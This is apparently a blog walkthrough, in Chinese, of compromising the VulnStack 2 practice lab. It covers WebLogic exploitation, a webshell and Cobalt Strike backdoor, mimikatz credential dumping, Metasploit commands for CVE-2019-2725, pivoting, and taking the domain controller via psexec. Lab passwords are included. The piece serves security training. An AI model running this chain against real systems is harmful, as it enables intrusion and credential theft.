前言：

開源靶場VulnStack是由國內紅日安全團隊打造一個靶場知識平臺。靶場設計思路來源ATT&CK紅隊評估模式，從漏洞利用、內網蒐集、橫向移動、構建通道、持久控制、痕跡清理等方式進行搭建靶場。最近正在學習內網知識，這一套靶場還是很有針對性的，可以拿來練手。本次針對第二套靶場進行搭建、環境配置，以及根據滲透測試流程進行滲透，從web應用程式到內網拿下主機，將整個滲透過程記錄下來分享給大家。

一、環境搭建

1.1 網路拓撲圖構建

1.2 IP配置

攻擊機：kali LinuxNAT模式
192.168.85.139（外）
**************************************

WEB伺服器：Windows server 2008 NAT模式+僅主機模式（需要以使用者de1aly登入，本地登入時賬戶administrator沒有密碼，需要重新建立密碼1qaz@WSX）
NAT模式：192.168.85.201（外）
僅主機模式：192.168.163.101（內）
PC機：Windows 7 NAT模式+僅主機模式
NAT模式：192.168.85.200（外）
僅主機模式：192.168.163.100（內）
DC域控伺服器：Windows server 2012 僅主機模式
192.168.163.10（內）

二、相關配置

2.1 攻擊機：kali Linux

先從WEB機開始，注意需要手動開啟服務，路徑如下：

C:\Oracle\Middleware\user_projects\domains\base_domain\bin下有一個startWeblogic的批處理，管理員身份執行它即可，管理員賬號密碼：Administrator/1qaz@WSX

2.2 WEB機和PC機：
計算機右鍵->管理->配置->服務->Server、Workstation、Computer Browser 全部啟動（Computer Browser 一直自動關閉導致 net view 顯示 6118 error 沒能解決，在域資訊收集時暫時關閉一下防火牆）

2.3 Web伺服器：Windowsserver 2008

開機後啟動360防護軟體。

手動開啟Computer Browser、Server、Workstation等服務

2.4 PC機：Windows 7

開機後啟動360防護軟體。

手動開啟Computer Browser、Server、Workstation服務。

2.5 DC域控伺服器：Windowsserver 2012

三、滲透過程記錄

3.1 資訊收集（注：本次滲透是分段多次進行的，所以可能存在IP變化）
已知web伺服器ip地址：192.168.85.201

Nmap掃描主機埠：

主機開放了7001埠，提供Oracle weblogic服務

用工具檢測weblogic漏洞，發現後臺路徑以及一個SSRF漏洞和兩個CVE漏洞。

3.2 驗證：
1）後臺

2）SSRF

3）上傳冰蠍馬

4）冰蠍連線：

5）cs後門

6）mimikatz抓取密碼

現在基本可以確定：
存在域：DE1AY
密碼基本都是：1qaz@WSX

3.3 利用msf打cve：

CVE-2019-2725
useexploit/multi/misc/weblogic_deserialize_asyncresponseservice
setrhost 目標IP
setlhost 攻擊機IP
settarget 1 #指定靶機是Windows

run

檢視開放的埠

新增賬戶

遠端登入+獲取域控制器的IP

掛代理，掃內網

設定路由

檢視ARP快取

拿下域控制器
因為之前拿下那臺主機裡面有個de1ay賬戶好像有域管理許可權知道密碼，可以遠端桌面登入看看，發現果然是域管理許可權，能連上域控制器

然後直接使用psexec連線域控制器拿下域控

之後利用msf生成一個正向shell馬，然後使用copy命令上傳，然後拿下域控制器。拿下了域控制器，自然之前橫向沒有拿到的win7主機也變成了囊中之物，最後整個域所有主機的shell如下圖所示：

 2022-03-15 14:12:21